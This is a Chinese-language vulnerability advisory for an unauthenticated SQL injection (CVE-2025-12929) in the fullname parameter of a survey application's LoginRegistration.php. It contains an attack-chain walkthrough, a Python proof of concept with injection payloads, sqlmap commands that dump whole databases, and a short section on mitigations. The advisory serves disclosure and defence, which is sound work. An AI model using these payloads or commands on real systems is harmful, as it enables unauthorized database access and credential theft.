CVE-2025-12929 SourceCodester Survey Application System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12929

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Survey Application System 1.0

漏洞概述

CVE-2025-12929是SourceCodester Survey Application System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于LoginRegistration.php文件中的save_user和update_user函数中，攻击者可以通过操纵fullname参数实现SQL注入攻击。由于该漏洞可被远程利用且无需认证，攻击者可以在不需要任何用户交互的情况下，通过网络直接发起攻击，成功利用后可获取数据库中的敏感信息，包括用户凭证、个人数据等。该漏洞的CVSS评分为7.3，属于高危级别。攻击者可能利用该漏洞进行未授权访问、数据窃取、权限提升等恶意操作，严重威胁系统安全。建议受影响用户尽快采取修复措施或实施临时缓解方案。

技术细节

该SQL注入漏洞位于SourceCodester Survey Application System 1.0的LoginRegistration.php文件中，具体影响save_user和update_user两个函数。漏洞根源在于程序对用户输入的fullname参数缺乏有效的输入验证和SQL语句预编译处理。攻击者可以通过构造恶意的SQL语句片段作为fullname参数值，实现SQL注入攻击。

漏洞利用方式：攻击者构造包含SQL代码的fullname参数，例如使用UNION SELECT、布尔盲注、时间盲注等技术提取数据库信息。由于参数直接拼接到SQL查询语句中，攻击者可以绕过认证机制、获取敏感数据、甚至修改数据库内容。

受影响的参数可能不限于fullname，其他用户输入参数也可能存在类似问题。攻击者可通过自动化工具批量探测和利用该漏洞。成功利用后可能导致：
1. 数据库敏感信息泄露（用户账号、密码哈希、邮箱等）
2. 数据库内容篡改
3. 在某些配置下可能实现远程代码执行
4. 进一步横向移动攻击内网其他系统

攻击链分析

STEP 1

1

信息收集：攻击者首先访问目标网站，识别出使用SourceCodester Survey Application System 1.0

STEP 2

2

漏洞探测：访问LoginRegistration.php页面，识别可用的参数和功能点

STEP 3

3

构造恶意载荷：构造包含SQL注入代码的fullname参数值，如' OR '1'='1

STEP 4

4

发送攻击请求：通过HTTP POST请求将恶意载荷发送到save_user或update_user端点

STEP 5

5

验证漏洞：观察响应包中的SQL错误信息或数据泄露情况，确认漏洞存在

STEP 6

6

数据提取：使用sqlmap等工具自动化提取数据库中的敏感信息（用户账号、密码等）

STEP 7

7

权限提升：利用获取的凭证信息登录系统后台，进一步获取更高权限或执行其他攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-12929 SQL Injection PoC # Target: SourceCodester Survey Application System 1.0 # Location: /LoginRegistration.php - save_user/update_user function # Parameter: fullname TARGET_URL = "http://target.com/LoginRegistration.php" def sql_injection_test(): """ Test for SQL injection vulnerability in fullname parameter """ # Basic SQL injection test payload payloads = [ "test' OR '1'='1", "test' UNION SELECT 1,2,3,4,5--", "test' AND SLEEP(5)--", "test' AND 1=1--", "test' AND 1=2--" ] headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print("[*] Testing SQL Injection vulnerability...") print(f"[*] Target: {TARGET_URL}") for i, payload in enumerate(payloads, 1): print(f"\n[*] Test {i}: {payload}") # Test save_user function data_save = { 'fullname': payload, 'action': 'save_user', 'username': 'testuser', 'email': '[email protected]', 'password': 'test123' } try: response = requests.post(TARGET_URL, data=data_save, headers=headers, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for SQL error indicators if 'sql' in response.text.lower() or 'error' in response.text.lower(): print("[!] Potential SQL error detected!") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] For detailed exploitation, use sqlmap:") print(f"sqlmap -r request.txt --level=5 --risk=3 -p fullname") def extract_data_with_sqlmap(): """ Generate sqlmap command for data extraction """ print("\n[*] Sqlmap commands for exploitation:") print("=" * 60) print("# Get database version") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --batch --dbs') print("\n# Get current database") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --current-db') print("\n# Dump all data") print(f'sqlmap -u "{TARGET_URL}" --data="fullname=test&action=save_user" -p fullname --dump-all') if __name__ == "__main__": sql_injection_test() extract_data_with_sqlmap()

影响范围

SourceCodester Survey Application System 1.0

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1）使用Web应用防火墙规则过滤包含SQL注入特征的请求；2）对LoginRegistration.php页面实施IP访问限制；3）暂时禁用用户注册和更新功能；4）加强数据库账户权限控制，移除不必要的数据库写权限；5）部署入侵检测系统监控异常SQL查询行为；6）实施输入白名单机制，仅允许fullname参数包含字母、数字和基本标点符号。